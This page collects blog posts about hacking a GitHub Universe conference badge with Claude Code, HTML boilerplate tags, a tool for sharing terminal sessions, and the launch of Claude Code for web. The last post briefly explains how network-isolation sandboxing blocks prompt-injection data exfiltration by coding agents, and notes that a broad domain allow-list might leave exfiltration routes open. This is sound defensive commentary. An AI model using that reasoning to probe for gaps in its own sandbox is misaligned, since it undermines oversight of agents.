Unmount the disk, hit the reboot button on the back of the badge and when it comes back up again the badge app should look something like this: Here's the official documentation for building software for the badge. When I got mine yesterday the official repo had not yet been updated, so I had to figure this out myself. I copied all of the code across to my laptop, added it to a Git repo and then fired up Claude Code and told it: Here's the result , which was really useful for getting a start on understanding how it all worked. Each of the six default apps lives in a folder, for example apps/sketch/ for the sketching app. There's also a menu app which powers the home screen. That lives in apps/menu/ . You can edit code in here to add new apps that you create to that screen. I told Claude: This was a bit of a long-shot, but it totally worked! The first version had an error: I OCRd that photo (with the Apple Photos app) and pasted the message into Claude Code and it fixed the problem. This almost worked... but the addition of a seventh icon to the 2x3 grid meant that you could select the icon but it didn't scroll into view. I had Claude fix that for me too . Here's the code for apps/debug/__init__.py , and the full Claude Code transcript created using my terminal-to-HTML app described here . Here are the four screens of the debug app: The icons used on the app are 24x24 pixels. I decided it would be neat to have a web app that helps build those icons, including the ability to start by creating an icon from an emoji. I built this one using Claude Artifacts . Here's the result, now available at tools.simonwillison.net/icon-editor : I noticed that last year's badge configuration app (which I can't find in github.com/badger/badger.github.io any more, I think they reset the history on that repo?) worked by talking to MicroPython over the Web Serial API from Chrome. Here's my archived copy of that code .
Wouldn't it be useful to have a REPL in a web UI that you could use to interact with the badge directly over USB? I pointed Claude Code at a copy of that repo and told it: It took a bit of poking (here's the transcript ) but the result is now live at tools.simonwillison.net/badge-repl . It only works in Chrome - you'll need to plug the badge in with a USB-C cable and then click "Connect to Badge". If you're a GitHub Universe attendee I hope this is useful. The official badger.github.io site has plenty more details to help you get started. There isn't yet a way to get hold of this hardware outside of GitHub Universe - I know they had some supply chain challenges just getting enough badges for the conference attendees! It's a very neat device, built for GitHub by Pimoroni in Sheffield, UK. A version of this should become generally available in the future under the name "Pimoroni Tufty 2350". You are only seeing the long-form articles from my blog. Subscribe to /atom/everything/ to get all of my posts, or take a look at my other subscription options .

1 views
Jim Nielsen 1 months ago

Don’t Forget These Tags to Make HTML Work Like You Expect

I was watching Alex Petros’ talk and he has a slide in there titled “Incantations that make HTML work correctly”. This got me thinking about the basic snippets of HTML I’ve learned to always include in order for my website to work as I expect in the browser — like “Hey I just made a file on disk and am going to open it in the browser. What should be in there?” This is what comes to mind: Without `<!doctype html>`, browsers may switch to quirks mode, emulating legacy, pre-standards behavior. This will change how calculations work around layout, sizing, and alignment. `<!doctype html>` is what you want for consistent rendering. Or `<!DOCTYPE HTML>` if you prefer writing markup like it’s 1998. Or even `<!dOcTyPe hTmL>` if you eschew all societal norms. It’s case-insensitive so they’ll all work. Declare the document’s language with `<html lang="en">`. Browsers, search engines, assistive technologies, etc. can leverage it to:

- Get pronunciation and voice right for screen readers
- Improve indexing and translation accuracy
- Apply locale-specific tools (e.g. spell-checking)

Omit it and things will look ok, but lots of basic web-adjacent tools might get things wrong. Specifying it makes everything around the HTML work better and more accurately, so I always try to remember to include it. This piece of info can come back from the server as a header, e.g. `Content-Type: text/html; charset=utf-8`. But I like to set it in my HTML with `<meta charset="utf-8">`, especially when I’m making files on disk I open manually in the browser. This tells the browser how to interpret text, ensuring characters like é, ü, and others display correctly. So many times I’ve opened a document without this tag and things just don’t look right — like my smart quotes . For example: copy this snippet, stick it in an HTML file, and open it on your computer: Things might look a bit wonky. But stick a `<meta charset="utf-8">` tag in there and you’ll find some relief. Sometimes I’ll quickly prototype a little HTML and think, “Great it’s working as I expect!” Then I go open it on mobile and everything looks tiny — “[Facepalm] you forgot the meta viewport tag!” Take a look at this screenshot, where I forgot the meta viewport tag on the left but included it on the right: That ever happen to you? No, just me?
Well anyway, `<meta name="viewport" content="width=device-width, initial-scale=1">` is a good ‘un to include to make HTML work the way you expect. I know what you’re thinking, I forgot the most important snippet of them all for writing HTML:
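Putting the pieces together, a minimal on-disk file with all four incantations looks like this:

```html
<!doctype html>
<html lang="en">
  <head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <title>Hello</title>
  </head>
  <body>
    <p>“Smart quotes” render correctly, layout math behaves, and mobile text isn’t tiny.</p>
  </body>
</html>
```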

1 views
Simon Willison 1 months ago

Video: Building a tool to copy-paste share terminal sessions using Claude Code for web

This afternoon I was manually converting a terminal session into a shared HTML file for the umpteenth time when I decided to reduce the friction by building a custom tool for it - and on the spur of the moment I fired up Descript to record the process. The result is this new 11 minute YouTube video showing my workflow for vibe-coding simple tools from start to finish. The problem I wanted to solve involves sharing my Claude Code CLI sessions - and the more general problem of sharing interesting things that happen in my terminal. A while back I discovered (using my vibe-coded clipboard inspector ) that copying and pasting from the macOS terminal populates a rich text clipboard format which preserves the colors and general formatting of the terminal output. The problem is that format looks like this: This struck me as the kind of thing an LLM might be able to write code to parse, so I had ChatGPT take a crack at it and then later rewrote it from scratch with Claude Sonnet 4.5 . The result was this rtf-to-html tool which lets you paste in rich formatted text and gives you reasonably solid HTML that you can share elsewhere. To share that HTML I've started habitually pasting it into a GitHub Gist and then taking advantage of gistpreview.github.io , a neat little unofficial tool that accepts and displays the gist content as a standalone HTML page... which means you can link to rendered HTML that's stored in a gist. So my process was:

- Copy terminal output
- Paste into rtf-to-html
- Copy resulting HTML
- Paste that into a new GitHub Gist
- Grab that Gist's ID
- Share the link to gistpreview.github.io

Not too much hassle, but frustratingly manual if you're doing it several times a day. Ideally I want a tool where I can do this:

- Copy terminal output
- Paste into a new tool
- Click a button and get a link to share

I decided to get Claude Code for web to build the entire thing. Here's the full prompt I used on claude.ai/code , pointed at my repo, to build the tool: It's quite a long prompt - it took me several minutes to type! But it covered the functionality I wanted in enough detail that I was pretty confident Claude would be able to build it.
I'm using one key technique in this prompt: I'm referencing existing tools in the same repo and telling Claude to imitate their functionality. I first wrote about this trick last March in Running OCR against PDFs and images directly in your browser , where I described how a snippet of code that used PDF.js and another snippet that used Tesseract.js was enough for Claude 3 Opus to build me this working PDF OCR tool . That was actually the tool that kicked off my tools.simonwillison.net collection in the first place, which has since grown to 139 and counting. Here I'm telling Claude that I want the RTF to HTML functionality of rtf-to-html.html combined with the Gist saving functionality of openai-audio-output.html . That one has quite a bit going on. It uses the OpenAI audio API to generate audio output from a text prompt, which is returned by that API as base64-encoded data in JSON. Then it offers the user a button to save that JSON to a Gist, which gives the snippet a URL. Another tool I wrote, gpt-4o-audio-player.html , can then accept that Gist ID in the URL and will fetch the JSON data and make the audio playable in the browser. Here's an example . The trickiest part of this is API tokens. I've built tools in the past that require users to paste in a GitHub Personal Access Token (PAT) (which I then store in localStorage in their browser - I don't want other people's authentication credentials anywhere near my own servers). But that's a bit fiddly. Instead, I figured out the minimal Cloudflare worker necessary to implement the server-side portion of GitHub's authentication flow. That code lives here and means that any of the HTML+JavaScript tools in my collection can implement a GitHub authentication flow if they need to save Gists. But I don't have to tell the model any of that! I can just say "do the same trick that openai-audio-output.html does" and Claude Code will work the rest out for itself.
Here's what the resulting app looks like after I've pasted in some terminal output from Claude Code CLI: It's exactly what I asked for, and the green-on-black terminal aesthetic is spot on too. There are a bunch of other things that I touch on in the video. Here's a quick summary:

- tools.simonwillison.net/colophon is the list of all of my tools, with accompanying AI-generated descriptions. Here's more about how I built that with Claude Code and notes on how I added the AI-generated descriptions .
- gistpreview.github.io is really neat.
- I used Descript to record and edit the video. I'm still getting the hang of it - hence the slightly clumsy pan-and-zoom - but it's pretty great for this kind of screen recording.
- The site's automated deploys are managed by this GitHub Actions workflow . I also have it configured to work with Cloudflare Pages for those preview deployments from PRs (here's an example ).
- The automated documentation is created using my llm tool and llm-anthropic plugin. Here's the script that does that , recently upgraded to use Claude Haiku 4.5.

Simon Willison 1 month ago

Claude Code for web - a new asynchronous coding agent from Anthropic

Anthropic launched Claude Code for web this morning. It's an asynchronous coding agent - their answer to OpenAI's Codex Cloud and Google's Jules - and has a very similar shape. I had preview access over the weekend and I've already seen some very promising results from it.

It's available online at claude.ai/code and shows up as a tab in the Claude iPhone app as well:

As far as I can tell it's their latest Claude Code CLI app wrapped in a container (Anthropic are getting really good at containers these days) and configured to . It appears to behave exactly the same as the CLI tool, and includes a neat "teleport" feature which can copy both the chat transcript and the edited files down to your local Claude Code CLI tool if you want to take over locally.

It's very straightforward to use. You point Claude Code for web at a GitHub repository, select an environment (fully locked down, restricted to an allow-list of domains, or configured to access domains of your choosing, including "*" for everything) and kick it off with a prompt. While it's running you can send it additional prompts, which are queued up and executed after it completes its current step. Once it's done it opens a branch on your repo with its work and can optionally open a pull request.

Claude Code for web's PRs are indistinguishable from Claude Code CLI's, so Anthropic told me it was OK to submit those against public repos even during the private preview. Here are some examples from this weekend:

That second example is the most interesting. I saw a tweet from Armin about his MiniJinja Rust template language adding support for Python 3.14 free threading. I hadn't realized that project had Python bindings, so I decided it would be interesting to see a quick performance comparison between MiniJinja and Jinja2.
I ran Claude Code for web against a private repository with a completely open environment ( in the allow-list) and prompted:

I’m interested in benchmarking the Python bindings for https://github.com/mitsuhiko/minijinja against the equivalente template using Python jinja2

Design and implement a benchmark for this. It should use the latest main checkout of minijinja and the latest stable release of jinja2.

The benchmark should use the uv version of Python 3.14 and should test both the regular 3.14 and the 3.14t free threaded version - so four scenarios total

The benchmark should run against a reasonably complicated example of a template, using template inheritance and loops and such like

In the PR include a shell script to run the entire benchmark, plus benchmark implantation, plus markdown file describing the benchmark and the results in detail, plus some illustrative charts created using matplotlib

I entered this into the Claude iPhone app on my mobile keyboard, hence the typos. It churned away for a few minutes and gave me exactly what I asked for. Here's one of the four charts it created:

(I was surprised to see MiniJinja out-performed by Jinja2, but I guess Jinja2 has had a decade of clever performance optimizations and doesn't need to deal with any extra overhead of calling out to Rust.)

Note that I would likely have got the exact same result running this prompt against Claude CLI on my laptop. The benefit of Claude Code for web is entirely in its convenience as a way of running these tasks in a hosted container managed by Anthropic, with a pleasant web and mobile UI layered over the top.
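I haven't reproduced the exact benchmark Claude generated, but the timing harness at the heart of a four-scenario comparison like this usually boils down to something like the following sketch (stdlib-only and my own illustration; the real thing would call Jinja2's and MiniJinja's actual render functions on the inheritance-heavy template):

```python
import timeit

def benchmark(render, iterations=1000, repeats=5):
    # Time `iterations` calls to render(), `repeats` times over, and
    # report the best run per call - the usual way to reduce noise in
    # microbenchmarks.
    timer = timeit.Timer(render)
    runs = timer.repeat(repeat=repeats, number=iterations)
    return min(runs) / iterations

# Stand-in for "render a reasonably complicated template"; the real
# benchmark would invoke jinja2 and minijinja here, once per scenario.
def fake_render():
    return "".join(f"<li>{i}</li>" for i in range(100))

per_call = benchmark(fake_render)
print(f"{per_call * 1e6:.2f} µs per render")
```

Run once per engine under both the regular 3.14 and the 3.14t free-threaded interpreter, that gives the four numbers behind the charts.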
It's interesting how Anthropic chose to announce this new feature: the product launch is buried halfway down their new engineering blog post Beyond permission prompts: making Claude Code more secure and autonomous , which starts like this:

Claude Code's new sandboxing features, a bash tool and Claude Code on the web, reduce permission prompts and increase user safety by enabling two boundaries: filesystem and network isolation.

I'm very excited to hear that Claude Code CLI is taking sandboxing more seriously. I've not yet dug into the details of that - it looks like it's using seatbelt on macOS and Bubblewrap on Linux. Anthropic released a new open source (Apache 2) library, anthropic-experimental/sandbox-runtime , with their implementation of this so far.

Filesystem sandboxing is relatively easy. The harder problem is network isolation, which they describe like this:

Network isolation , by only allowing internet access through a unix domain socket connected to a proxy server running outside the sandbox. This proxy server enforces restrictions on the domains that a process can connect to, and handles user confirmation for newly requested domains. And if you’d like further-increased security, we also support customizing this proxy to enforce arbitrary rules on outgoing traffic.

This is crucial to protecting against both prompt injection and lethal trifecta attacks. The best way to prevent lethal trifecta attacks is to cut off one of the three legs, and network isolation is how you remove the data exfiltration leg that allows successful attackers to steal your data.

If you run Claude Code for web in "No network access" mode you have nothing to worry about. I'm a little bit nervous about their "Trusted network access" environment. It's intended to only allow access to domains relating to dependency installation, but the default domain list has dozens of entries, which makes me nervous about unintended exfiltration vectors sneaking through.
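The core decision that proxy makes for each outgoing connection is an allow-list check on the domain. Anthropic's sandbox-runtime implements this itself, but the logic is simple enough to sketch independently (my own illustration, including the "*" wildcard behavior the environments support; the subdomain-matching rule here is an assumption, not taken from their code):

```python
def is_domain_allowed(host: str, allowlist: list[str]) -> bool:
    # "*" allows everything; "*.example.com"-style entries match the
    # bare domain and any subdomain; anything else is an exact match.
    host = host.lower().rstrip(".")
    for entry in allowlist:
        entry = entry.lower()
        if entry == "*":
            return True
        if entry.startswith("*."):
            if host == entry[2:] or host.endswith(entry[1:]):
                return True
        elif host == entry:
            return True
    return False

print(is_domain_allowed("pypi.org", ["pypi.org", "*.github.com"]))        # True
print(is_domain_allowed("api.github.com", ["pypi.org", "*.github.com"]))  # True
print(is_domain_allowed("evil.example", ["pypi.org", "*.github.com"]))    # False
```

The exfiltration worry is visible right in this sketch: every extra entry in the allow-list is another domain an injected prompt could use to smuggle data out.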
You can also configure a custom environment with your own allow-list. I have one called "Everything" which allow-lists "*", because for projects like my MiniJinja/Jinja2 comparison above there are no secrets or source code involved that need protecting.

I see Anthropic's focus on sandboxes as an acknowledgment that coding agents run in YOLO mode ( and the like) are enormously more valuable and productive than agents where you have to approve their every step. The challenge is making it convenient and easy to run them safely. This kind of sandboxing is the only approach to safety that feels credible to me.

Update: A note on cost: I'm currently using a Claude "Max" plan that Anthropic gave me in order to test some of their features, so I don't have a good feeling for how much Claude Code would cost for these kinds of projects. From running (an unofficial cost estimate tool ) it looks like I'm using between $1 and $5 worth of daily Claude CLI invocations at the moment.

- Add query-string-stripper.html tool against my simonw/tools repo - a very simple task that created (and deployed via GitHub Pages) this query-string-stripper tool.
- minijinja vs jinja2 Performance Benchmark - I ran this against a private repo and then copied the results here, so no PR. Here's the prompt I used.
- Update deepseek-ocr README to reflect successful project completion - I noticed that the README produced by Claude Code CLI for this project was misleadingly out of date, so I had Claude Code for web fix the problem.
